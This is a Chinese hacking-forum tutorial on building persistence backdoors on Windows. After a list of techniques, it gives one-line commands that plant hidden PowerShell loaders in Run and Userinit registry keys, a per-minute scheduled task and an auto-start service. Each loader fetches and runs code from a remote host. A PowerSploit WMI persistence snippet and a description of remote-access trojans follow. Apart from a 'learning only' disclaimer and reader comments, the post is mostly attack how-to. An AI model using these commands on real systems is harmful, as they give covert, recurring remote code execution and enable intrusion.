【大白分享】渗透安全之Windows权限维持后门铸造篇

大家好，我是大白，道德不是从天上掉下来的。它是从日常的坚持不懈的斗争和锻炼中发展和巩固起来的，正如玉石越磨越亮，黄金越炼越纯一样。依旧感谢各位小伙伴的一路支持与陪伴。

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取！！！！

今天分享大白的渗透安全之Windows权限维持后门铸造篇，上一篇我们分享的是后门隐藏篇，那么本次是针对Windows系统的后门铸造篇，同样还是对于好多小伙伴来说，这个更加偏向于安服，总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要，我们可以一同研习一下渗透攻防的“魅力”。

Windows常见的后门：

1.shift后门

这个算是比较古老还比较"经典的"的隐藏方式了,这里简单讲一下,在windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能。

2.注册表自启动

MSF的Persistence模块利用的就是写注册表自启动项来实现的,一般自启动项是这两个键:Run和RunOnce

3.定时任务

Windows实现定时任务主要有schtasks与at二种方式.简单的说schtasks是at的升级版本.

at:at命令在win7-08等高版本的windows中是不能将任务在前台执行的,也就是只会打开一个后台进程.

schtasks:是将定时的任务在前台执行.

4.WMI

WMI是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机.主要与Powershell命令配合使用可以实现无文件攻击重要方式,具有良好的隐蔽性也是目前较为常用的持久化手段.

5.屏幕保护程序

利用屏幕保护程序进行权限维持

6.启动服务

自启动服务一般是在电脑启动后在后台默认或者加载指定的服务程序,可以将exe应用程序注册为服务,也可以将dll文件注册为服务.

7.DLL劫持

如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去指定的目录下查找这个DLL.

如果攻击者能够控制其中的某一 个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行.

8.影子账户

CMD创建用户时 后面加一个$可以创建一个匿名用户,创建完毕后我们再把这个用户添加到administrator组

9.COM劫持

主要通过修改CLSID下的注册表键值，实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例,所以,这就可以用作后门来使用,并且,该方法也能够绕过Autoruns对启动项的检测.

10.BITS Jobs后门

BITS Jobs是windows后台智能传输服务,全称Background Intelligent Transfer Service (BITS),用于HTTP或SMB文件传输.

它可以给任务设置优先级和异步下载,智能调节带宽,从而不占用其他应用的网络资源.

Powershell和bitsadmin.exe都可用于创建和管理Bits Job,但Powershell似乎只支持文件传输,windows原生程序bitsadmin.exe还支持传输完成后执行代码.

11.:INF文件后门

INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件.

INF文件最常用于安装硬件组件的设备驱动程序.Windows包含用于创建基于INF的安装的IExpress工具.

INF文件是Windows安装程序API及其后续版本Windows Installer的一部分.

12.文件关联

文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系.一个文件可以与多个应用程序发生关联.可以利用文件的"打开方式"进行关联选择.

我们今天介绍几种方式：

1.注册表自启动

通过修改注册表自启动键值，添加一个木马程序路径，实现开机自启动。

常用的注册表启动键：

1. # Run键
   
2. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   
3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   
4. 
   
5. # Winlogon\Userinit键
   
6. HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
   
7. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon
   
8. 
   
9. 类似的还有很多,关键词：注册表启动键值。

复制代码

使用以下命令可以一键实现无文件注册表后门：

1. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\"" /f

复制代码

2.Logon Scripts 后门

注册表路径：HKEY_CURRENT_USER\Environment\

创建字符串键值： UserInitMprLogonScript，键值设置为bat的绝对路径：c:\test.bat

3.userinit后门

在用户进行登陆时，winlogon运行指定的程序。根据官方文档,可以更改它的值来添加与删除程序。

利用USERINIT注册表键实现无文件后门：

1. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
   
2. 
   
3. "Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\""

复制代码

4.组策略设置脚本启动

运行gpedit.msc进入本地组策略，通过Windows设置的“脚本(启动/关机)”项来说实现。因为其极具隐蔽性，因此常常被攻击者利用来做服务器后门。

1. 脚本需全路径，如C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

复制代码

5.计划任务

通过window系统的任务计划程序功能实现定时启动某个任务，执行某个脚本。

使用以下命令可以一键实现：

1. schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://IP:端口/logo.gif\"\"\"))\""

复制代码

容易遇到的问题：cmd命令行执行单引号会被替换成双引号，故这里使用三个双引号替代。

计划脚本每 1 分钟运行一次。

6.服务自启动

通过服务设置自启动，结合powershell实现无文件后门。

使用以下命令可实现：

1. sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8888/logo.gif'))\""
   
2. 
   
3. sc description  KeyName "Just For Test"   //设置服务的描述字符串
   
4. sc config Name start= auto                //设置这个服务为自动启动
   
5. net start Name                            //启动服务

复制代码

成功创建了一个自启动服务

7.WMI后门

在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的WMI。这里可以利用一个工具powersploit，下面用它的Persistence模块来示范一个简单的例子。

1. Import-Module .\Persistence\Persistence.psm1
   
2. $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
   
3. $UserOptions = New-UserPersistenceOption -Registry -AtLogon
   
4. Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

复制代码

8.dll劫持

如果在进程尝试加载一个DLL时没有指定DLL的绝对路径，那么Windows会尝试去指定的目录下查找这个DLL；如果攻击者能够控制其中的某一 个目录，并且放一个恶意的DLL文件到这个目录下，这个恶意的DLL便会被进程所加载，从而造成代码执行。

比较常用的如LPK.dll的劫持：

win7及win7以上系统增加了KnownDLLs保护，需要在注册表：

1. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls

复制代码

9.COM劫持

利用COM劫持技术，最为关键的是dll的实现以及CLSID的选择，通过修改CLSID下的注册表键值，实现对CAccPropServicesClass和MMDeviceEnumerator劫持，而系统很多正常程序启动时需要调用这两个实例。这种方法可以绕过Autoruns对启动项的检测。

10.远程控制

远控木马是一种恶意程序，其中包括在目标计算机上用于管理控制的后门。远程访问木马通常与用户请求的程序（如游戏程序）一起，是一种看不见的下载，或作为电子邮件附件发送。一旦主机系统被攻破，入侵者可以利用它来向其他易受感染的计算机分发远程访问木马，从而建立僵尸网络。

一般分为客户端和服务端，如：灰鸽子、上兴远控、梦想时代、QuasarRAT等。

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取！！！！

以上就是本次的渗透安全之Windows权限维持后门隐藏篇，一句忠告：业务备份一时不做一时爽，问题出现两行泪，感谢大佬们的参阅，此贴先到这里后续会带上更加实用的帖子，感谢大家！

励志分享超清壁纸语句~~：

诚召天下客,誉从信中来。——谚语

好的今天就到这里，老样子，感谢各位大神的参阅，孩子为了挣豆子不容易，孩子家里穷没豆子吃饭了！！！

壁纸很好看，建议下次换成老哥的高清写真，肯定很圈粉

感谢分享有助于工资和学习！

每日打卡学习，感谢分享，学习了！！！

非常有帮助，很有参考价值

感谢楼主分享，学习一下

感谢楼主分享，努力学习中！！！